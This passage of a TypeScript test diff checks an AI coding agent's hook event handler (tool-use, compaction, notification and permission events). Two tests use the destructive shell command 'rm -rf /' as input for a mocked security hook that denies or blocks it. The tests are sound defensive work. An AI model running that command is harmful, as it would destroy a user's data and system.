expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + }); + + describe('firePreToolUseEvent', () => { + it('should execute hooks for PreToolUse event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreToolUseEvent( + 'test-tool', + { param: 'value' }, + 'toolu_test123', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + 
HookEventName.PreToolUse, + { toolName: 'test-tool' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreToolUseEvent( + 'shell', + { command: 'ls -la' }, + 'toolu_abc456', + PermissionMode.Plan, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + tool_name: string; + tool_input: Record; + tool_use_id: string; + }; + + expect(input.permission_mode).toBe(PermissionMode.Plan); + expect(input.tool_name).toBe('shell'); + expect(input.tool_input).toEqual({ command: 'ls -la' }); + expect(input.tool_use_id).toBe('toolu_abc456'); + }); + + it('should pass tool name as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePreToolUseEvent( + 'Bash', + { command: 'npm test' }, + 'toolu_xyz789', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreToolUse, + { toolName: 'Bash' }, + ); + }); + + it('should handle permission decision in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + 
command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + hookSpecificOutput: { + hookEventName: 'PreToolUse', + permissionDecision: 'deny', + permissionDecisionReason: 'Dangerous command blocked', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreToolUseEvent( + 'Bash', + { command: 'rm -rf /' }, + 'toolu_danger', + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.hookSpecificOutput).toEqual({ + hookEventName: 'PreToolUse', + permissionDecision: 'deny', + permissionDecisionReason: 'Dangerous command blocked', + }); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreToolUseEvent( + 'test-tool', + { param: 'value' }, + 'toolu_seq', + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('PreToolUse planner error'); + }); + + const result = await hookEventHandler.firePreToolUseEvent( + 'test-tool', + { param: 'value' }, + 'toolu_error', + 
PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('PreToolUse planner error'); + }); + }); + + describe('firePostToolUseEvent', () => { + it('should execute hooks for PostToolUse event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePostToolUseEvent( + 'test-tool', + { param: 'value' }, + { result: 'success' }, + 'toolu_test123', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PostToolUse, + { toolName: 'test-tool' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseEvent( + 'shell', + { command: 'ls -la' }, + { files: ['a.txt', 'b.txt'] }, + 'toolu_abc456', + PermissionMode.Yolo, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + tool_name: string; + tool_input: Record; + tool_response: Record; + tool_use_id: string; + }; + + expect(input.permission_mode).toBe(PermissionMode.Yolo); + expect(input.tool_name).toBe('shell'); + 
expect(input.tool_input).toEqual({ command: 'ls -la' }); + expect(input.tool_response).toEqual({ files: ['a.txt', 'b.txt'] }); + expect(input.tool_use_id).toBe('toolu_abc456'); + }); + + it('should pass tool name as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePostToolUseEvent( + 'Write', + { file_path: '/test.txt', content: 'hello' }, + { success: true }, + 'toolu_write123', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PostToolUse, + { toolName: 'Write' }, + ); + }); + + it('should handle decision block in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + decision: 'block', + reason: 'Lint errors detected', + hookSpecificOutput: { + hookEventName: 'PostToolUse', + additionalContext: 'Please fix the lint errors', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePostToolUseEvent( + 'Write', + { file_path: '/test.ts', content: 'const x = 1' }, + { success: true }, + 'toolu_lint', + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.decision).toBe('block'); + expect(result.finalOutput?.reason).toBe('Lint errors detected'); + }); + + it('should execute 
hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseEvent( + 'test-tool', + { param: 'value' }, + { result: 'ok' }, + 'toolu_seq', + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('PostToolUse planner error'); + }); + + const result = await hookEventHandler.firePostToolUseEvent( + 'test-tool', + { param: 'value' }, + { result: 'ok' }, + 'toolu_error', + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('PostToolUse planner error'); + }); + }); + + describe('firePreCompactEvent', () => { + it('should execute hooks for PreCompact event with manual trigger', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Manual, + 'Keep important code', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreCompact, + { 
trigger: PreCompactTrigger.Manual }, + ); + expect(result.success).toBe(true); + }); + + it('should execute hooks for PreCompact event with auto trigger', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Auto, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreCompact, + { trigger: PreCompactTrigger.Auto }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Manual, + 'Custom instructions for compaction', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + trigger: PreCompactTrigger; + custom_instructions: string; + }; + + expect(input.trigger).toBe(PreCompactTrigger.Manual); + expect(input.custom_instructions).toBe( + 'Custom instructions for compaction', + ); + }); + + it('should use empty string for custom_instructions when not provided', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + 
vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Auto); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + trigger: PreCompactTrigger; + custom_instructions: string; + }; + + expect(input.trigger).toBe(PreCompactTrigger.Auto); + expect(input.custom_instructions).toBe(''); + }); + + it('should pass trigger as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Manual); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreCompact, + { trigger: PreCompactTrigger.Manual }, + ); + }); + + it('should handle additionalContext in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + hookSpecificOutput: { + hookEventName: 'PreCompact', + additionalContext: 'Preserve function signatures', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Auto, + ); + 
+ expect(result.success).toBe(true); + expect(result.finalOutput?.hookSpecificOutput).toEqual({ + hookEventName: 'PreCompact', + additionalContext: 'Preserve function signatures', + }); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Manual); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('PreCompact planner error'); + }); + + const result = await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Auto, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('PreCompact planner error'); + }); + + it('should handle both trigger types correctly', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test Manual trigger + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Manual); + let mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; 
+ let input = mockCalls[mockCalls.length - 1][2] as { + trigger: PreCompactTrigger; + }; + expect(input.trigger).toBe(PreCompactTrigger.Manual); + + // Test Auto trigger + await hookEventHandler.firePreCompactEvent(PreCompactTrigger.Auto); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + trigger: PreCompactTrigger; + }; + expect(input.trigger).toBe(PreCompactTrigger.Auto); + }); + }); + + describe('fireNotificationEvent', () => { + it('should execute hooks for Notification event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireNotificationEvent( + 'Test notification message', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.Notification, + { notificationType: 'permission_prompt' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireNotificationEvent( + 'Qwen Code needs your permission to use Bash', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + 
const input = mockCalls[0][2] as { + message: string; + notification_type: string; + title?: string; + }; + + expect(input.message).toBe('Qwen Code needs your permission to use Bash'); + expect(input.notification_type).toBe('permission_prompt'); + expect(input.title).toBe('Permission needed'); + }); + + it('should pass notification_type as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.fireNotificationEvent( + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.Notification, + { notificationType: 'idle_prompt' }, + ); + }); + + it('should handle notification without title', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireNotificationEvent( + 'Authentication successful', + NotificationType.AuthSuccess, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + message: string; + notification_type: string; + title?: string; + }; + + expect(input.message).toBe('Authentication successful'); + expect(input.notification_type).toBe('auth_success'); + expect(input.title).toBeUndefined(); + }); + + it('should handle 
auth_success notification type', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireNotificationEvent( + 'Authentication successful', + NotificationType.AuthSuccess, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.Notification, + { notificationType: 'auth_success' }, + ); + expect(result.success).toBe(true); + }); + + it('should handle elicitation_dialog notification type', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireNotificationEvent( + 'Dialog shown to user', + NotificationType.ElicitationDialog, + 'Dialog', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.Notification, + { notificationType: 'elicitation_dialog' }, + ); + expect(result.success).toBe(true); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await 
hookEventHandler.fireNotificationEvent( + 'Test notification', + NotificationType.PermissionPrompt, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('Notification planner error'); + }); + + const result = await hookEventHandler.fireNotificationEvent( + 'Test notification', + NotificationType.PermissionPrompt, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('Notification planner error'); + }); + + it('should handle all notification types correctly', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test permission_prompt + await hookEventHandler.fireNotificationEvent( + 'Permission needed', + NotificationType.PermissionPrompt, + ); + let mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + let input = mockCalls[mockCalls.length - 1][2] as { + notification_type: string; + }; + expect(input.notification_type).toBe('permission_prompt'); + + // Test idle_prompt + await hookEventHandler.fireNotificationEvent( + 'Waiting for input', + NotificationType.IdlePrompt, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + notification_type: string; + }; + expect(input.notification_type).toBe('idle_prompt'); + + // Test auth_success + await hookEventHandler.fireNotificationEvent( + 'Authentication 
successful', + NotificationType.AuthSuccess, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + notification_type: string; + }; + expect(input.notification_type).toBe('auth_success'); + + // Test elicitation_dialog + await hookEventHandler.fireNotificationEvent( + 'Dialog shown', + NotificationType.ElicitationDialog, + ); + mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock.calls; + input = mockCalls[mockCalls.length - 1][2] as { + notification_type: string; + }; + expect(input.notification_type).toBe('elicitation_dialog'); + }); + }); + + describe('firePermissionRequestEvent', () => { + it('should execute hooks for PermissionRequest event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'ls -la' }, + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PermissionRequest, + { toolName: 'Bash' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePermissionRequestEvent( + 'Write', + { file_path: '/test.txt', content: 'hello' 
}, + PermissionMode.Yolo, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + tool_name: string; + tool_input: Record; + permission_suggestions: PermissionSuggestion[]; + }; + + expect(input.permission_mode).toBe(PermissionMode.Yolo); + expect(input.tool_name).toBe('Write'); + expect(input.tool_input).toEqual({ + file_path: '/test.txt', + content: 'hello', + }); + expect(input.permission_suggestions).toBeUndefined(); + }); + + it('should include permission_suggestions when provided', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const suggestions: PermissionSuggestion[] = [ + { type: 'toolAlwaysAllow', tool: 'Bash' }, + ]; + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'npm test' }, + PermissionMode.Default, + suggestions, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_suggestions: PermissionSuggestion[]; + }; + + expect(input.permission_suggestions).toEqual(suggestions); + }); + + it('should pass tool name as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePermissionRequestEvent( + 'ReadFile', + { 
file_path: '/test.txt' }, + PermissionMode.Plan, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PermissionRequest, + { toolName: 'ReadFile' }, + ); + }); + + it('should handle decision block in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + decision: 'block', + reason: 'Dangerous command detected', + hookSpecificOutput: { + hookEventName: 'PermissionRequest', + decision: { + behavior: 'deny', + message: 'Destructive system command blocked by security hook', + interrupt: true, + }, + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'rm -rf /' }, + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.decision).toBe('block'); + expect(result.finalOutput?.reason).toBe('Dangerous command detected'); + }); + + it('should handle allow decision with updatedInput', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + hookSpecificOutput: { + hookEventName: 'PermissionRequest', + decision: { + behavior: 'allow', + updatedInput: { command: 'npm install --dry-run' }, + }, + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await 
hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'npm install' }, + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.hookSpecificOutput).toEqual({ + hookEventName: 'PermissionRequest', + decision: { + behavior: 'allow', + updatedInput: { command: 'npm install --dry-run' }, + }, + }); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'ls' }, + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('PermissionRequest planner error'); + }); + + const result = await hookEventHandler.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('PermissionRequest planner error'); + }); + + it('should handle all permission modes correctly', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + 
